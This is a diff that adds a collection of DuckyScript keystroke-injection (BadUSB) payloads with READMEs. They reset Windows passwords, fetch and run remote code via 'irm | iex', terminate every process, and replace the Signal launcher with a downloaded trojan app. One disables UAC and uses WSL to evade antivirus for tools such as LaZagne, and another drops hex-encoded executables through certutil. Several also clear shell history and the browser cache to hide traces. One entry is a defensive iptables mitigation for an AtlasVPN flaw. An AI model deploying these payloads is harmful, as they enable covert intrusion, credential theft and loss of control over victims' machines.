+DEFINE #IPADDRESS 192.168.1.100
+DEFINE #SUBNETMASK 255.255.255.0
+DEFINE #GATEWAY 192.168.1.1
+
+
+DELAY 1000
+CTRL-ALT t
+DELAY 2000
+
+
+REM #### PERMISSIONS SECTION ####
+STRINGLN sudo su
+
+DELAY 1000
+STRINGLN SUDO_PASS
+DELAY 1000
+
+REM #### IP SECTION ####
+REM net-tools command
+STRING apt install net-tools
+ENTER
+DELAY 2000
+
+REM Set network interface
+
+STRINGLN IP="#IPADDRESS"
+DELAY 500
+STRINGLN MASK="#SUBNETMASK"
+DELAY 500
+STRINGLN GATEWAY="#GATEWAY"
+DELAY 500
+
+REM Get the net interface name
+STRINGLN INTERFACE=$(ip route get 8.8.8.8 | awk '{print $5}')
+DELAY 500
+STRINGLN ifconfig $INTERFACE $IP netmask $MASK up
+DELAY 500
+
+REM #### REMOVE TRACES ####
+STRINGLN history -c
+DELAY 500
+
+REM Close shell
+STRINGLN exit

payloads/library/execution/Change_Windows_User_Name/README.md

@@ -0,0 +1,43 @@
+# Change Windows User Name
+
+This script can be used to change the windows user name.
+
+**Category**: Execution
+
+## Description
+
+This script can be used to change the windows user name.
+
+The script opens the research app and go to User Accounts settings using the default path `Control Panel\All Control Panel Items\User Accounts`, then go to "Change your account name" option and set the new name, save it and close the app.
+
+It is absurd that you can do so many things on windows without asking for permissions.
+
+### Dependencies
+
+* Set the new name that you want to set
+
+```DuckyScript
+DEFINE NEW_NAME example
+```
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/Change_Windows_User_Name/payload.txt

@@ -0,0 +1,41 @@
+REM #############################################
+REM #                                           |
+REM # Title        : Change Windows User Name   |
+REM # Author       : Aleff                      |
+REM # Version      : 1.0                        |
+REM # Category     : Execution                  |
+REM # Target       : Windows 10/11              |
+REM #                                           |
+REM #############################################
+
+REM Requirements:
+REM     - Nothing
+
+REM Note:
+REM     - Payload tested on Windows 11 Eng 
+
+REM Set the new name that you want to set
+DEFINE NEW_NAME example
+
+DEFAULT_DELAY 500
+REM Open Windows research
+GUI
+DELAY 1000
+
+REM Search and opern explorer app
+STRINGLN explorer
+
+REM Goto search bar and open User Accounts settings
+REPEAT 3 TAB
+ENTER
+STRINGLN Control Panel\All Control Panel Items\User Accounts
+DELAY 1500
+
+REM Goto "Change you account name"
+TAB
+ENTER
+
+STRING NEW_NAME
+TAB
+ENTER
+ALT F4

payloads/library/execution/Change_the_password_of_the_windows_user/README.md

@@ -0,0 +1,50 @@
+# Change the password of the windows user
+
+Through this script you will be able to change windows user's password super fast.
+
+**Category**: Execution
+
+## Description
+
+Through this script you will be able to change windows user's password super fast.
+
+A PowerShell with administrator permissions is started, and through the use of the `net` command you can change the password without necessarily having to know the original password.
+
+It is always very fascinating to see how many things you can do on Windows systems without needing to know the original password. As fascinating as it is disturbing.
+
+## Dependencies
+
+* Nothing (i know it's absurd)
+
+## Example
+
+- `STRINGLN Get-ExecutionPolicy -List`
+![](docs/1.png)
+
+- `STRINGLN Set-ExecutionPolicy Bypass`
+![](docs/2.png)
+
+- `STRINGLN Get-ExecutionPolicy -List`
+![](docs/3.png)
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/Change_the_password_of_the_windows_user/payload.txt

@@ -0,0 +1,32 @@
+REM ############################################################
+REM #                                                          |
+REM # Title        : Change the password of the Windows user   |
+REM # Author       : Aleff                                     |
+REM # Version      : 1.0                                       |
+REM # Category     : Execution                                 |
+REM # Target       : Windows 10-11                             |
+REM #                                                          |
+REM ############################################################
+
+REM Requirements:
+REM     - Nothing (i know it's absurd)
+
+REM You must define the new Windows user password
+DEFINE NEW_PASSWORD example
+
+DELAY 1000
+GUI x
+DELAY 500
+STRING a
+DELAY 500
+LEFT_ARROW
+DELAY 500
+ENTER
+
+DELAY 2000
+STRING net user $env:USERNAME 
+STRING NEW_PASSWORD
+ENTER
+DELAY 1000
+
+ALT F4

payloads/library/execution/CloseAllApplicationsInWindows/README.md

@@ -0,0 +1,46 @@
+# Close All Applications - BADUSB ✅
+
+A script used to close all target open applications.
+
+🟢 **Plug-And-Play** 🟢
+
+**Category**: Execution
+
+## Description
+
+A script used to close all target open applications.
+
+Opens PowerShell hidden, download a Python script, execute it, remove Python script downloaded, delete powershell history.
+
+## Getting Started
+
+### Dependencies
+
+* Internet Connection
+* Windows 10,11
+
+### Settings
+
+- No settings - Plug-And-Play
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/CloseAllApplicationsInWindows/close_all_app.ps1

@@ -0,0 +1,18 @@
+# Download Python script
+
+# Reply $scriptUrl with YOUR LINK. The Payload should be script.py
+$scriptUrl = "YOUR_END_USER_LINK_WITH_PAYLOAD"
+$savePath = "$env:temp\script.py"
+(New-Object System.Net.WebClient).DownloadFile($scriptUrl, $savePath)
+
+# Execute Python script
+& python $savePath
+
+# Delete the downloaded script
+Remove-Item $savePath
+
+# Clear the download history from the system's web cache
+Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\Windows\WebCache\*" -Recurse -Force
+
+# Clear the PowerShell command history
+Clear-History

payloads/library/execution/CloseAllApplicationsInWindows/payload.txt

@@ -0,0 +1,34 @@
+REM #####################################################
+REM #                                                   |
+REM # Title        : Close All Applications             |
+REM # Author       : Aleff                              |
+REM # Version      : 1.0                                |
+REM # Category     : Execution                          |
+REM # Target       : Windows 10-11                      |
+REM #                                                   |
+REM #####################################################
+
+REM Plug-And-Play
+
+REM 
+REM 1. Open a powershell
+REM 2. Download a Python script
+REM 3. Execute it
+REM 4. Remove Python script downloaded
+REM 5. Delete powershell history
+REM
+
+REM Reply with YOUR LINK. The Payload should be close_all_app.ps1
+DEFINE POWERSHELL_CODE example.com
+
+DELAY 2000
+GUI x
+DELAY 250
+REPEAT 10 DOWNARROW
+ENTER
+DELAY 1000
+REPEAT 2 TAB
+ENTER
+DELAY 2000
+STRING irm POWERSHELL_CODE | iex
+ENTER

payloads/library/execution/CloseAllApplicationsInWindows/script.py

@@ -0,0 +1,12 @@
+try:
+    import psutil
+except:
+    import os
+    os.system("pip install psutil")
+    import psutil
+
+for process in psutil.process_iter():
+    try:
+        process.terminate()
+    except:
+        pass

payloads/library/execution/Defend_yourself_against_AtlasVPN_bugdoor/README.md

@@ -0,0 +1,112 @@
+# Defend yourself against AtlasVPN *Bug-Door*
+
+This script has been developed to allow you to mitigate a well-known vulnerability in the AtlasVPN client based on its APIs, which, as of today, has not been resolved. The term "bugdoor" has been coined to describe this situation, as the bug has been reported multiple times without being addressed, effectively creating an open backdoor (bug + backdoor).
+
+**Category**: Incident Response
+
+![](1.png)
+
+## Table of contents:
+
+- Payload description
+- AtlasVPN vulnerability
+- - Summary
+- - Dependencies
+- Settings
+- - Administrative Privileges
+- - Set the rule
+- - See the rule
+- - Remove the rule
+- Credits
+
+## Payload description
+
+This payload arises from the need to address a 0day vulnerability, which is now reasonable to assume has been known for mounths (maybe years), within the Linux client of AtlasVPN version 1.0.3. This vulnerability leads to a leakage of the user's real IP address, a situation that typically requires a prompt response from the company to provide a resolution patch and mitigate potential attacks.
+
+However, in this case, the user who discovered the vulnerability had already proactively informed and reported it to the company in question. Surprisingly, up to this point, the company has not only failed to release any patches but has also not made any statements regarding the issue. This raises serious doubts about the nature of the problem, prompting questions (as highlighted by the vulnerability reporter) about the possibility that it might be an intentional bug or a deliberate backdoor, given that it is such a trivial error that it is absurd it hasn't been addressed proactively.
+
+It's important to emphasize that these considerations represent personal opinions based on the original 0day report's message and should encourage discussions about cybersecurity and the reliability of the VPN service offered. If the company decides to provide a patch, it should also be required to explain the reason behind this prolonged negligence.
+
+## AtlasVPN vulnerability
+
+From [AtlasVPN Linux Client 1.0.3 Remote Disconnect Exploit](https://www.reddit.com/r/cybersecurity/comments/167f16e/atlasvpn_linux_client_103_remote_disconnect/)
+
+>  The following is my 0day. This code, when executed on any website, disconnects the AtlasVPN linux client and leaks the users IP address. I am not yet aware of it being used in the wild. However, it shows that AtlasVPN does not take their users safety serious, because their software security decisions suck so massively that its hard to believe this is a bug rather than a backdoor. Nobody can be this incompetent. I tried to contact their support to get hold of a security contact, a pgp key or any signs of a bug bounty programme. Nope. No answer.
+
+### Summary
+
+>  The AtlasVPN Linux Client consists of two parts. A daemon (atlasvpnd) that manages the connections and a client (atlasvpn) that the user controls to connect, disconnect and list services. The client does not connect via a local socket or any other secure means but instead it opens an API on localhost on port 8076. It does not have ANY authentication. This port can be accessed by ANY program running on the computer, including the browser. A malicious javascript on ANY website can therefore craft a request to that port and disconnect the VPN. If it then runs another request, this leaks the users home IP address to ANY website using the exploit code.
+
+The exploit code will not be included in this payload, as the primary goal here is defensive, not offensive. It's important to note that it's relatively easy to find a fully functional Proof of Concept (POC) for this vulnerability online if you need it for vulnerability testing purposes.
+
+### Dependencies
+
+Source [1]: https://www.reddit.com/r/cybersecurity/comments/167f16e/atlasvpn_linux_client_103_remote_disconnect/
+
+Source [2] (Italian article): https://www.redhotcyber.com/post/ce-poco-da-nascondersi-il-bug-sul-client-di-atlas-vpn-rende-tutti-visibili/
+
+## Settings
+
+In order to mitigate this critical vulnerability, it is imperative to understand its operation at a more detailed level. Specifically, in the case of the AtlasVPN client, it is relevant to note that it opens an API service on localhost at port 8076 without any form of authentication. This lack of authentication allows, based on this specific detail, full access not only to any programs running on the computer but also (and this is the most concerning aspect) to any website making appropriate requests. This is an extremely serious vulnerability that exposes the user significantly. Therefore, waiting for a patch is not acceptable, and it is essential to take prompt action, even independently, perhaps using this payload.
+
+This "home-made" solution involves partially closing port 8076, specifically by disabling the ability to establish new incoming connections through the same port. It is important to note that there are various attack strategies that could potentially bypass this protection, but at least a basic level of security is applied, which is not present by default. It is crucial to understand that this solution does not completely resolve the vulnerability but rather reduces the risk of being targeted by attacks based on it.
+
+### Administrative Privileges
+
+To apply this homemade patch, you will need to set up a Firewall rule, and therefore, you must have knowledge of the password to acquire administrator or root permissions.
+
+### Set the rule
+
+The Firewall rule that will be set will aim to block all connections that try to create a new connection on port 8076.
+
+`sudo iptables -A INPUT -p tcp --dport 8076 -m state --state NEW -j DROP`
+
+**sudo**: The command is run with administrator or root privileges to allow configuration of firewall rules.
+
+**iptables**: This is the command for configuring the firewall iptables.
+
+**-A INPUT**: This indicates that the rule will be added to the input chain, which handles incoming traffic.
+
+**-p tcp**: This specifies that the rule applies only to TCP traffic.
+
+**--dport 8076**: Specifies that the rule applies to traffic destined for port 8076.
+
+**-m state --state NEW**: Uses the "state" form to specify that the rule applies only to new incoming connections ("NEW" state).
+
+**-j DROP**: Indicates that the action to be taken for matches to this rule is "DROP," i.e., rejecting or blocking the connection.
+
+### See the rule
+
+If you want to see the rule you can use the command `iptables -S` with `grep "8076"`.
+
+`sudo iptables -S | grep "8076"`
+
+### Remove the rule
+
+One of the ways to delete iptables rules is by rule specification. To do so, you can run the iptables command with the -D option followed by the rule specification.
+
+`sudo iptables -D INPUT -p tcp --dport 8076 -m state --state NEW -j DROP`
+
+![](1.png)
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/Defend_yourself_against_AtlasVPN_bugdoor/payload.txt

@@ -0,0 +1,32 @@
+REM ############################################################
+REM #                                                          #
+REM # Title        : Defend yourself against AtlasVPN Bug-Door #
+REM # Author       : Aleff                                     #
+REM # Version      : 1.0                                       #
+REM # Category     : Execution                                 #
+REM # Target       : Linux                                     #
+REM #                                                          #
+REM ############################################################
+
+REM Requirements:
+REM     - Administrator Permission
+REM     - AtlasVPN installed
+
+REM Define the sudo user password
+DEFINE #SUDO-PWS example
+
+DELAY 1000
+CTRL-ALT t
+DELAY 2000
+
+REM Add the rule and close the shell
+STRINGLN sudo iptables -A INPUT -p tcp --dport 8076 -m state --state NEW -j DROP; exit;
+
+REM Add the rule and display it
+REM STRINGLN sudo iptables -A INPUT -p tcp --dport 8076 -m state --state NEW -j DROP; sudo iptables -S | grep "8076";
+
+REM Remove the rule
+REM STRINGLN sudo iptables -D INPUT -p tcp --dport 8076 -m state --state NEW -j DROP
+
+DELAY 500
+STRINGLN #SUDO-PWS

payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/README.md

@@ -0,0 +1,58 @@
+# Edit The Default Real App With An Arbitrary
+
+A script used to download a modified application on the target computer that will be executed insted off the original one without notify it to the user.
+
+**Category**: Execution
+
+## Description
+
+A script used to download a modified application on the target computer that will be executed insted off the original one without notify it to the user.
+
+The script will download the zip archive in wich you should have the modified application, then unzip the archive and remove the original zip, then replace the original desktop file with the one that is present on the archive.
+
+## Getting Started
+
+### Dependencies
+
+* sudo permissions
+* Internet Connection
+* Original application installed 
+
+### Settings
+
+- Set the link from which to download the zipper archive
+```DuckyScript
+DEFINE ARBITRARY_APP_LINK example
+```
+
+- You must set the desktop file path present in the zip file, if i.e. you have the app name Signal and the desktop file path is Signal/files/signal you should put the path Signal/files/signal
+```DuckyScript
+DEFINE PATH_TO_DESKTOP_FILE example/path
+```
+
+- You must know the original desktop name file, if you don't know it you can rich this information download the app on you system and going to /usr/share/applications/ searching this one app, i.e. the desktop file name of Signal application is signal-desktop.desktop, so in this case you should put signal-desktop.desktop
+```DuckyScript
+DEFINE ORIGINAL_DESKTOP_FILE_NAME example
+```
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/[EXAMPLE]arbitrary_file.desktop

@@ -0,0 +1,10 @@
+[Desktop Entry]
+Name=Signal
+Exec=~/.arbitrary/bin/signal-desktop --no-sandbox %U
+Terminal=false
+Type=Application
+Icon=signal-desktop
+StartupWMClass=Signal
+Comment=Private messaging from your desktop
+MimeType=x-scheme-handler/sgnl;x-scheme-handler/signalcaptcha;
+Categories=Network;InstantMessaging;Chat;

payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/[EXAMPLE]original_desktop_file.desktop

@@ -0,0 +1,10 @@
+[Desktop Entry]
+Name=Signal
+Exec=/opt/Signal/signal-desktop --no-sandbox %U
+Terminal=false
+Type=Application
+Icon=signal-desktop
+StartupWMClass=Signal
+Comment=Private messaging from your desktop
+MimeType=x-scheme-handler/sgnl;x-scheme-handler/signalcaptcha;
+Categories=Network;InstantMessaging;Chat;

payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/payload.txt

@@ -0,0 +1,62 @@
+REM ################################################################
+REM #                                                              |
+REM # Title        : Edit The Default Real App With An Arbitrary   |
+REM # Author       : Aleff                                         |
+REM # Version      : 1.0                                           |
+REM # Category     : Execution                                     |
+REM # Target       : GNU/Linux (Debian based tested)               |
+REM #                                                              |
+REM ################################################################
+
+
+REM Requirements:
+REM     - sudo permissions
+REM     - Internet connection
+REM     - Executable app
+REM     - '.desktop' file
+
+
+REM Note:
+REM     - The Depends* time depends by the app size, the connection fast and the computer power, you should test it
+
+
+REM Set the link from wich will be downloaded the zip archive
+DEFINE ARBITRARY_APP_LINK example
+
+REM You must set the desktop file path present in the zip file, if i.e. you have the app name Signal and the desktop file path is Signal/files/signal you should put the path Signal/files/signal
+DEFINE PATH_TO_DESKTOP_FILE example/path
+
+REM You must know the original desktop name file, if you don't know it you can rich this information download the app on you system and going to /usr/share/applications/ searching this one app, i.e. the desktop file name of Signal application is signal-desktop.desktop, so in this case you should put signal-desktop.desktop
+DEFINE ORIGINAL_DESKTOP_FILE_NAME example
+
+REM sudo permissions needed
+DEFINE SUDO example
+
+
+REM Open a shell
+DELAY 2000
+CTRL-ALT t
+DELAY 1000
+
+STRING curl -o ./arbitrary.zip "
+STRING ARBITRARY_APP_LINK
+STRINGLN "
+REM Depends*
+DELAY 5000
+
+STRINGLN unzip ./arbitrary.zip -d ./.arbitrary
+REM Depends*
+DELAY 2000
+STRINGLN rm ./arbitrary.zip
+DELAY 1000
+
+STRING sudo mv ./.arbitrary/
+STRING PATH_TO_DESKTOP_FILE
+STRING /usr/share/applications/
+STRING ORIGINAL_DESKTOP_FILE_NAME
+ENTER
+DELAY 1000
+STRING SUDO
+ENTER
+DELAY 4000
+ALT f4

payloads/library/execution/ExploitingAnExecutableFile/README.md

@@ -0,0 +1,50 @@
+# Exploiting An Executable File - Linux ✅
+
+Plug-And-Play ❤️
+
+A script used to detect all executable files in a Linux system. An executable file can be used in cybersecurity to execute some script without having the necessary permissions to make it executable.
+
+**Category**: Execution
+
+## Description
+
+A script used to detect all executable files in a Linux system. An executable file can be used in cybersecurity to execute some script without having the necessary permissions to make it executable.
+
+**Remember that any execution that is not permitted is not legitimate**.
+
+## Getting Started
+
+### Dependencies
+
+* Linux system
+
+### Settings
+
+* You can edit the content that you want to put into the executable file.
+
+```Shell
+# You can put whatever you want into the executable file
+echo "/bin/sh" > "$file"
+```
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/ExploitingAnExecutableFile/payload.txt

@@ -0,0 +1,39 @@
+REM ################################################
+REM #                                              |
+REM # Title        : Exploiting An Executable File |
+REM # Author       : Aleff                         |
+REM # Version      : 1.0                           |
+REM # Category     : Execution                     |
+REM # Target       : Linux                         |
+REM #                                              |
+REM ################################################
+
+REM Requirements:
+REM     - Nothing, it is Plug-And-Play but you can change it as you want.
+
+DELAY 1000
+CTRL-ALT t
+DELAY 2000
+
+
+REM #### Script ####
+
+
+STRINGLN_BLOCK
+  function search_file {
+    for file in "$1"/*; do
+      if [[ -d "$file" ]]; then
+        search_file "$file";
+      elif [[ -f "$file" && -r "$file" && -w "$file" && -x "$file" ]]; then
+        echo "File Found: $file";
+        # You can put whatever you want into the executable file
+        # echo "/bin/sh" > "$file"
+      fi
+    done
+  }
+  USER=$(whoami);
+  # You can choose whatever folder you want, the script is recursive.
+  DIR=/home/$USER/Documents;
+  search_file "$DIR";
+END_STRINGLN
+ENTER

payloads/library/execution/ExploitingAnExecutableFile/script.sh

@@ -0,0 +1,19 @@
+#!/bin/bash
+
+function search_file {
+  for file in "$1"/*; do
+    if [[ -d "$file" ]]; then
+      search_file "$file"
+    elif [[ -f "$file" && -r "$file" && -w "$file" && -x "$file" ]]; then
+      echo "File Found: $file"
+      # You can put whatever you want into the executable file
+      # echo "/bin/sh" > "$file"
+    fi
+  done
+}
+
+USER=$(whoami)
+
+# You can choose whatever folder you want, the script is recursive.
+DIR=/home/$USER/Documents
+search_file "$DIR"

payloads/library/execution/FodCable - UAC Bypass/README.md

@@ -1,6 +1,6 @@
 **Title: FodCable - UAC Bypass**
 
-Author: 0iphor13
+Author: 0i41E
 
 Version: 1.0
 

payloads/library/execution/FodCable2 - UAC Bypass/README.md

@@ -1,6 +1,6 @@
 **Title: FodCableII - UAC Bypass**
 
-<p>Author: 0iphor13<br>
+<p>Author: 0i41E<br>
 Version: 1.0<br>
 Requirements: OMG Firmware v.2.5 or higher</p>
 

payloads/library/execution/FodCable2 - UAC Bypass/payload.txt

@@ -1,7 +1,7 @@
 REM       FodCableII
 REM       Version 1.0
 REM       OS: Windows
-REM       Author: 0iphor13
+REM       Author: 0i41E
 REM	  Requirements: OMG Firmware v.2.5 or higher
 
 REM       Using FodHelper.exe to bypass UAC and get an elevated shell

payloads/library/execution/HideInWSL/payload.txt

@@ -0,0 +1,52 @@
+REM Title: HideInWSL
+REM Author: mylorik
+REM Description: 
+REM This payload is a POC of downloading a malicious file, like EICAR, while avoiding Windows Defender and 3rd party antivirus solutions without any tampering!
+REM This is done by downloading the file to the WSL2 distro
+REM Target: Windows 11 (Windows 10 1903+)
+REM System: OMG, firmware 3
+REM Details:
+REM While the antivirus cannot detect the downloaded file, it may be detected during Execution of that bad file, but even then it cannot remove the file from WSL2 distro!
+REM In my testing, LaZagne.exe can be downloaded and executed, you will get the loot, the antivirus will detect the execution and kill the process at some point, but you will get all loot and the file will remain in the WSL2 distro                       
+
+
+REM initial enumeration delay
+DELAY 2000
+
+REM change to your target language
+DUCKY_LANG us
+
+REM adjust DELAY to your system
+
+GUI r
+DELAY 100
+
+REM Open the Powershell as Administrator
+STRING powershell
+CTRL SHIFT ENTER
+DELAY 300
+ALT y
+
+DELAY 200
+
+REM Disabling the UAC (wsl --install would ask for it)
+STRINGLN Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
+
+REM We do not need to enable these, but here for reference. wsl --install will automatically enable VirtualMachinePlatform
+REM STRINGLN dism.exe /online /enable-feature /featurename:VirtualMachinePlatform /all /norestart
+REM STRINGLN dism.exe /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux /all /norestart
+
+REM Install WSL2
+STRINGLN wsl --install
+STRINGLN wsl --install Ubuntu
+
+REM We wait for the above two comanads to finish, at the end of "wsl --install Ubuntu" it will ask you to create username:password for Ubuntu, we don't have to provide it
+DELAY 55000
+CTRL c
+
+REM in Windows 10 the path may look different 
+REM download malicious file to the WSL2 distro
+STRINGLN wget https://secure.eicar.org/eicar.com.txt -O Microsoft.PowerShell.Core\FileSystem::\\wsl.localhost\Ubuntu\eicar.com.txt
+
+REM at this point you may execute the file downloaded above
+REM for example powershell -c "Microsoft.PowerShell.Core\FileSystem::\\wsl.localhost\Ubuntu\LaZagne.exe all -vv > "Microsoft.PowerShell.Core\FileSystem::\\wsl.localhost\Ubuntu\loot.txt";

payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/README.md

@@ -0,0 +1,125 @@
+# Install And Run Any Arbitrary Executable - No Internet And Root Needed
+
+Through this guide you will be able to create executable programs that can be installed via DuckyScript in such a way as to avoid using the Internet altogether. This type of installation can lead to serious damage to machines so do it only if you are fully aware and sure of what you are doing, in this example you will already find the code in hexadecimal but if you want to be sure recompile the executable following the following guide.
+
+Executables have been removed for security reasons.
+
+**Category**: Execution
+
+# Guide to Creating an Executable Program using Python
+
+## Introduction
+
+This guide provides detailed instructions on how to use Python to create an executable program, generate hexadecimal code, and automate the execution of the application trough DuckyScript. Practical example in assets directory.
+
+## Creating the Python Program
+
+To begin, create a Python program that performs the desired functionality. You can use any programming language of your choice, but for this guide, we'll be using Python.
+
+```python
+import ctypes
+
+ctypes.windll.user32.MessageBoxW(None, "Hello Hak5!", 'Info', 0x10 | 0x1)
+```
+
+## Creating the Executable using PyInstaller
+
+Once the Python program is ready, we can use PyInstaller to create an executable file. PyInstaller converts the Python program into a standalone executable that can be run on any compatible system without requiring Python to be installed.
+
+Install PyInstaller using the following command:
+
+```powershell
+pip install pyinstaller
+```
+
+To create the executable, run the following command in the terminal:
+
+```powershell
+pyinstaller --onefile full/path/to/the/file/example.py
+```
+
+Replace `example.py` with the filename of your Python script. The `--onefile` flag ensures that the output is a single executable file. Remember that the executable file can be found within the path `dist/example.exe`.
+
+## Generating Hexadecimal Code
+
+Next, we'll generate the hexadecimal code from the executable file. This step is necessary if you intend to automate the execution of the program.
+
+To generate the `hexadecimal` code, you can use various methods or libraries. In this case I decided to create another program in Python capable of doing this conversion, the partial code is as follows but you can find the entire file in the assets folder.
+
+```python
+# Rest of the code...
+with open(filename, 'rb') as file:
+    binary_data = file.read()
+    hex_code = binascii.hexlify(binary_data).decode()
+# ...
+```
+
+## Creating a DuckyScript to Automate Execution
+
+To create the payload in DuckyScript you simply add the hexadecimal code inside a STRING command immediately after opening the notepad.
+
+```duckyscript
+DEFINE #HEX_CODE <hexadecimal_code>
+
+DELAY 500
+GUI r
+DELAY 500
+STRING notepad.exe
+ENTER
+DELAY 500
+STRING #HEX_CODE
+
+DELAY 2000
+ALT F
+DELAY 1000
+STRING S
+DELAY 1000
+ALTSTRING "%TEMP%\script.hex"
+```
+
+Replace `<hexadecimal_code>` with the actual hexadecimal code generated in the previous step. I used a combo ALT F and STRING S for save the file using `"%TEMP%\script.hex"` that save it in a `TEMP` directory
+
+## Decoding Hexadecimal Code and Executing the Program
+Now, we need to decode the hexadecimal code and execute the program. We can use the `certutil` command to accomplish this.
+
+Once saved the file with a hex extension, run the following command in the Command Prompt:
+
+```powershell
+certutil -f -decodeHex "%TEMP%\script.hex" "%TEMP%\script.exe"
+```
+
+Replace `script.exe` with the desired output filename for the decoded program.
+
+Finally, run the executable on the computer, or any other compatible device, to open start execution of the program.
+
+These are the steps required to create an executable program with Python, generate the hexadecimal code, and automate its execution. Feel free to modify the instructions to suit your specific needs or programming language preferences.
+
+Happy Hacking!
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
+      </a>
+      <br>Instagram
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Discord
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/assets/README.md

@@ -0,0 +1,77 @@
+# Example
+
+Executables have been removed for security reasons.
+
+## File list
+
+- Python code: `example.py`
+- Convert to hex script: `convert_to_hex.py`
+- Executable file compiled using pyinstaller: `dist/example.exe`
+- Hexadecimal code output: `example.hex`
+- File compiled from hex code using certutil: `example.exe`
+
+## Procedure
+
+- This Python code create a Windows popup.
+
+```python
+import ctypes
+
+ctypes.windll.user32.MessageBoxW(None, "Hello Hak5!", 'Info', 0x10 | 0x1)
+```
+
+- Create the executable
+
+```powershell
+pyinstaller --onefile C:/Users/Aleff/Documents/Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/example.py
+```
+
+- Create the hex code
+
+```python
+import binascii
+
+def convert_to_hex(filename, output_file):
+    with open(filename, 'rb') as file:
+        binary_data = file.read()
+
+    hex_code = binascii.hexlify(binary_data).decode()
+
+    with open(output_file, 'w') as output:
+        output.write(hex_code)
+
+# Esempio di utilizzo
+exe_filename = 'C:/Users/Aleff/Documents/Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/dist/example.exe'
+output_filename = 'C:/Users/Aleff/Documents/Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/example.hex'
+convert_to_hex(exe_filename, output_filename)
+```
+
+- Create the DuckyScript payload
+
+```duckyscript
+GUI r
+DELAY 1000
